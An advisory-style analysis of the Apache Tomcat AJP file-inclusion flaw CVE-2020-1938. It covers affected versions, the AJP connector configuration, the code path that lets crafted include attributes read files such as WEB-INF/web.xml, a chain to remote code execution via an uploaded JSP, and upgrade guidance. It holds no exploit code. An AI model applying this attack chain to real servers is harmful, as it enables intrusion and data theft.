Exploiting Apache Tomcat AJP File Inclusion (CVE‑2020‑1938) for Remote Code Execution

1. Vulnerability Background

On February 20, 2020, 360CERT reported that CNVD‑2020‑10487 / CVE‑2020‑1938 is a high‑severity file‑inclusion vulnerability in Apache Tomcat. An attacker can read or include any file under the webapp directory, such as configuration files or source code. Affected versions include Tomcat 6, Tomcat 7 < 7.0.100, Tomcat 8 < 8.5.51, and Tomcat 9 < 9.0.31.

2. Affected Versions

Apache Tomcat 9.x < 9.0.31

Apache Tomcat 8.x < 8.5.51

Apache Tomcat 7.x < 7.0.100

Apache Tomcat 6.x

3. Vulnerability Analysis

3.1 AJP Connector

The Tomcat server uses Connector components to receive requests. The standard HTTP connector listens on port 8080, while the AJP connector uses port 8009 and the AJP/1.3 protocol, which is binary and often enabled for clustering or reverse‑proxy scenarios.

<code>&lt;Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" /&gt;</code>

<code>&lt;Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /&gt;</code>

By default Tomcat exposes the AJP port to the external network.

3.2 Code Analysis

The flaw originates in

org.apache.coyote.ajp.AbstractAjpProcessor.prepareRequest()

, where request attributes are processed. If an attribute is not in the allowed list, the code proceeds to construct a request object with attacker‑controlled attributes such as

javax.servlet.include.request_uri

,

javax.servlet.include.path_info

, and

javax.servlet.include.servlet_path

.

<code>javax.servlet.include.request_uri
javax.servlet.include.path_info
javax.servlet.include.servlet_path</code>

3.3 Arbitrary File Read

When the request reaches

org.apache.catalina.servlets.DefaultServlet.serveResource()

, the method

getRelativePath

extracts the

request_uri

and sets

pathInfo

and

servletPath

. Subsequently,

getResource

is called with the crafted path, allowing the attacker to read any file, e.g.,

/WEB-INF/web.xml

.

3.4 Remote Code Execution

If the attacker can control a JSP file (e.g., via file upload), the server processes it through

org.apache.jasper.servlet.JspServlet.service()

. The supplied

pathInfo

is handed to the JSP compiler, leading to execution of arbitrary code on the server.

4. Mitigation

Tomcat 6 is no longer maintained. Upgrade to a supported version:

Tomcat 7 → 7.0.100

Tomcat 8 → 8.5.51

Tomcat 9 → 9.0.31

Download links:

7.0.100: https://tomcat.apache.org/download-70.cgi

8.5.51: https://tomcat.apache.org/download-80.cgi

9.0.31: https://tomcat.apache.org/download-90.cgi